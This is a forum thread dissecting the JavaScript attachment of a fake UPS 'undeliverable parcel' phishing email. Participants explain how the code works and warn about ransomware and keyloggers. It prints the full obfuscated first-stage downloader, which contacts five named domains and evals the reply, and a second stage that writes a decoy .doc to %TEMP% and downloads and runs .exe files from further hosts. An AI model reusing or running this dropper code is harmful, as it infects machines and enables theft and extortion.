Announcement

Collapse
No announcement yet.

I have a surprise package for anyone who wants it

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    I have a surprise package for anyone who wants it

    I got this email msg today (and, it's not the first time Bob has told me about my package problems!):

    Dear Grey,


    We can not deliver your parcel arrived at April 09.


    Please review delivery label in attachment!


    Respectfully,
    Bob Archer,
    UPS Parcels Delivery Manager.
    That attachment is a zip file supposedly containing a defective label I am supposed to inspect and verify.


    Buried in it is a nice little javascript program. Should do wonders for your box, if you want to run it!
    Actually, I thought you might be curious as to what a javascript virus looks like! Can you parse the "pol.open" statement and learn which site the hacker is pulling the virus stuff from?

    Code:
    var pol = WScript.CreateObject("MSXML2.XMLHTTP");
    var jamie = ['/','t',"",":",'p','h','S','a',"T",''];
    jamie[1+1] = "GETA";
    jamie[2] = jamie[2].substr(0, 3);
    var zaher = "httpR";
    zaher = zaher.substr(0, 4);
    var x = ["dev.alaw.net","3outs.com","oieosterkamp.com","musica.urbandrulabs.com","austinshortterm.com"];
    var m = "0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0";
    var gyt = 0;
    var lub = "/";
    while(true)
    {
        if(gyt>=x.length)
        {
            break;
        }        
        try
        {                
            var ghyt = false;
            var tjkh = x[gyt+0];        
            pol.open(jamie[1+1], zaher + "" + jamie[3] + lub + "" + lub + tjkh + '/counter' + '?'+m, ghyt);
            pol.send();
            var r = pol.responseText;
            var rima = 500;
            var got = 50+450+rima;
            if ((r.length - got) > (6-6) && r.indexOf(m) > (got+1-1002))
            {
                var amel = muhter(r, m);
                var jimmk = amel.join(jamie[7]+"");
                if (1 == 1)
                {
                    ataaa(jamie[9] + jimmk + jamie[9]);
                }
                break;
            };
        }
        catch(e)
        {
        };
        gyt++;
    };
    function ataaa(ziyter) {eval(ziyter);}
    function muhter(kjg, lki) {return kjg.split(lki);}

    IF you look carefully you can probably detect the Russian influence!
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.

    #2
    So ,,,,,say a non coder like me got that attachment and found that code in it ,,,,,,,,,how could I "parse" it and see what it was going to do ,,,is their some way to enter a section of it ,like you posted and see what it's trying to do ,,,,or unmask the website it directing to ,,,or what ?

    VINNY
    i7 4core HT 8MB L3 2.9GHz
    16GB RAM
    Nvidia GTX 860M 4GB RAM 1152 cuda cores

    Comment


      #3
      found this ,,,,,https://myonlinesecurity.co.uk/spoof...d-locky-sites/

      he seems to be keeping a running report going on the web sites in the java script that contain the nasties
      alaw.net","3outs.com","oieosterkamp.com","musica.u rbandrulabs.com","austinshortterm.com"

      VINNY
      i7 4core HT 8MB L3 2.9GHz
      16GB RAM
      Nvidia GTX 860M 4GB RAM 1152 cuda cores

      Comment


        #4
        The code is pretty cryptic, but the key here is the first line:
        Code:
        var pol = WScript.CreateObject("MSXML2.XMLHTTP");
        Its creating an ajax object which will allow it to send data behind the scenes, which you can see here:
        Code:
        pol.open(jamie[1+1], zaher + "" + jamie[3] + lub + "" + lub + tjkh + '/counter' + '?'+m, ghyt);
        pol.send();
        So its looping through the array of urls (["dev.alaw.net","3outs.com","oieosterkamp.com","mus ica.urbandrulabs.com","austinshortterm.com"]) and sending them each a ajax request, then receiving a packet in the response. I'm not exactly sure what it's doing with the response, but probably nothing good.

        Comment


          #5
          Just for fun I thought I'd see what was in the received packet. Its even more cryptic than the first script. I cleaned it up slightly for easier reading.
          Code:
          v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD - ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r woof = 'v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r ld=';
          woof += '0; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r c';
          woof += 's=Str';
          woof += 'ing.fromCh';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0rCode(9';
          woof += '2); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' ll=["v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0k';
          woof += '.mond';
          woof += 'nr.ru';
          woof += '","de';
          woof += 'mo.urb';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndrul';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.com","';
          woof += 'ecomme';
          woof += 'rce.u';
          woof += 'rb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndr';
          woof += 'ul0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.co';
          woof += 'm","homb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0m';
          woof += 'ovie.r';
          woof += 'u","l';
          woof += 'ogo-red';
          woof += 'co.urb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0nd';
          woof += 'rul0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.co';
          woof += 'm"]; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r w';
          woof += 's=WScrip';
          woof += 't.Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0te';
          woof += 'Object("';
          woof += 'WScri';
          woof += 'pt.Shell';
          woof += '"); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r fn';
          woof += '=ws.E';
          woof += 'xp0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndEnvir';
          woof += 'onmentSt';
          woof += 'rings("%T';
          woof += 'EMP%")+cs';
          woof += '+"0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0"; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' xo=WS';
          woof += 'cript.Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'teObj';
          woof += 'ect("Msxml';
          woof += '2.XMLHTTP';
          woof += '"); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += '=WScrip';
          woof += 't.Cre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teObjec';
          woof += 't("ADODB.S';
          woof += 'tre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0m")';
          woof += '; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r fo=';
          woof += 'WScript.';
          woof += 'Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teObje';
          woof += 'ct("Sc';
          woof += 'ripti';
          woof += 'ng.FileS';
          woof += 'ystemObjec';
          woof += 't"); if (!';
          woof += 'fo.FileE';
          woof += 'xists(fn+"';
          woof += '.doc"';
          woof += ')) { v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' fp=fo.Cre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teText';
          woof += 'File(fn+';
          woof += '".doc"';
          woof += ',true)';
          woof += '; for(v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r ';
          woof += 'i=0; i';
          woof += '<11267; i+';
          woof += '+) { fp.W';
          woof += 'rite(St';
          woof += 'ring.from';
          woof += 'Ch0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0rCode';
          woof += '(M0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0th.fl';
          woof += 'oor(M0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'th.r0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndom';
          woof += '()*64+20';
          woof += '))); }; ';
          woof += 'fp.Clo';
          woof += 'se(); try';
          woof += '{ws.Ru';
          woof += 'n(fn+".do';
          woof += 'c",1,';
          woof += '0);}c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0t';
          woof += 'ch(er';
          woof += '){}; for(v';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r n=1;n<=';
          woof += '2;n++) {';
          woof += ' for(v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'r i=ld;i<';
          woof += 'll.leng';
          woof += 'th;i++';
          woof += ') { v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r dn';
          woof += '=0; try';
          woof += ' { xo.ope';
          woof += 'n("GET';
          woof += '","http:/';
          woof += '/"+ll[i]+';
          woof += '"/count';
          woof += 'er/?"+n,';
          woof += ' f0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0lse); x';
          woof += 'o.send()';
          woof += '; if(xo.s';
          woof += 't0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tus=';
          woof += '=200) ';
          woof += '{ x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.open';
          woof += '(); x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += '.type=1';
          woof += '; x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.write';
          woof += '(xo.respon';
          woof += 'seBod';
          woof += 'y); if(x';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.size>';
          woof += '10000) {';
          woof += ' dn=1;';
          woof += ' x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.s0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0veT';
          woof += 'oFile(fn';
          woof += '+n+".';
          woof += 'exe",';
          woof += '2); try{';
          woof += 'ws.Run';
          woof += '(fn+n+';
          woof += '".exe';
          woof += '",1,0)';
          woof += ';}c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tc';
          woof += 'h(er){}; }';
          woof += '; x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.';
          woof += 'close()';
          woof += '; }; if(d';
          woof += 'n==1)';
          woof += '{ld=i;bre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0k;}; } ';
          woof += 'c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tch(';
          woof += 'er){};';
          woof += ' }; }';
          woof += '; } else ';
          woof += '{ try{ws.R';
          woof += 'un(fn+"';
          woof += '.doc",';
          woof += '1,0);}';
          woof += 'c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tch';
          woof += '(er){';
          woof += '}; };';
          ev0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD - ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0l(woof);
          Im not going to spend too much time figuring this out, but some key parts:
          Creating a file system object
          Code:
          woof += 'ct("Sc';
          woof += 'ripti';
          woof += 'ng.FileS';
          woof += 'ystemObjec';
          woof += 't"); if (!';
          woof += 'fo.FileE';
          woof += 'xists(fn+"';
          woof += '.doc"';
          Using that object to attempt to write files
          Code:
          woof += '+) { fp.W';
          woof += 'rite(St';
          woof += 'ring.from';
          woof += 'Ch0000001Hmg
          Downloading more stuff
          Code:
          woof += 'n("GET';
          woof += '","http:/';
          woof += '/"+ll[i]+';
          woof += '"/count';
          woof += 'er/?"+n,';
          Trying to execute files
          Code:
          woof += 'oFile(fn';
          woof += '+n+".';
          woof += 'exe",';
          woof += '2); try{';
          woof += 'ws.Run';
          woof += '(fn+n+';
          woof += '".exe';
          woof += '",1,0)';
          Yeah, you probably don't want GreyGeek's surprise...

          Comment


            #6
            The Javascript I posted is a *little* more sophisticated than the ones shown in VINNY's link because in js in VINNY's link you can plainly see the "GET HTTP:// ...." sequence that starts off the first download of the next js script which is run in /tmp and gets deleted when done or at reboot. Subsequent js scripts eventually pull down the payload(s), which include ransomware, keyboard loggers, etc.... The world is full of lazy thieves.
            "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
            – John F. Kennedy, February 26, 1962.

            Comment

            Working...
            X